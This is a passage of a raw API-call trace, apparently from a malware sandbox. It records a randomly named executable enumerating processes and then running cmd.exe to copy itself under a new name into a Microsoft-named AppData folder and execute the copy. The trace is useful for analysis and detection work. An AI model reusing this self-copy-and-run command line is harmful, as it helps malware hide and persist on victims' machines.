cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0094.510] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0094.511] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.513] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.515] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0094.516] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0094.518] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.519] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.520] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.521] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.522] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0094.523] CloseHandle (hObject=0xc0) returned 1 [0094.523] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x12fee1c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0094.524] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0094.524] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0094.524] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\", lpszShortPath=0x12fee1c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\") returned 0x2a [0094.524] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0094.524] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0094.524] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" [PARAMS]", cchLength=0xbd | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\MICROS~1\\LSFKRHUR.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\MICROS~1\\LSFKRHUR.EXE\" [PARAMS]") returned 0xbd [0094.524] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0094.524] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb30*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb20 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessInformation=0x12fb20*(hProcess=0xc4, hThread=0xc0, dwProcessId=0xb34, dwThreadId=0xb38)) returned 1 [0094.530] CloseHandle (hObject=0xc4) returned 1 [0094.530] CloseHandle (hObject=0xc0) returned 1 [0094.530] Sleep (dwMilliseconds=0xfa) [0095.902] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc8 [0095.909] Process32FirstW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.909] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0095.910] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0095.911] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.912] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0095.913] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.913] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0095.914] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0095.915] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0095.916] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0095.917] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.918] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.919] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.920] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.920] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.921] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0095.922] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.923] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.924] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0095.925] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.927] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0095.928] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0095.930] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0095.931] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0095.933] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.934] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0095.936] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0095.937] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0095.939] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0095.940] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0095.942] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0095.943] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0095.945] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0095.946] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0095.947] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0095.948] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0096.043] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0096.044] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0096.045] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0096.047] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0096.048] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0096.049] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0096.050] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0096.051] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0096.052] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0096.053] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.055] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.056] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.058] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.059] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.060] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.061] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0096.062] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0096.063] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.065] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.066] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.068] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.069] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.070] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xafc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0096.071] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.072] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: 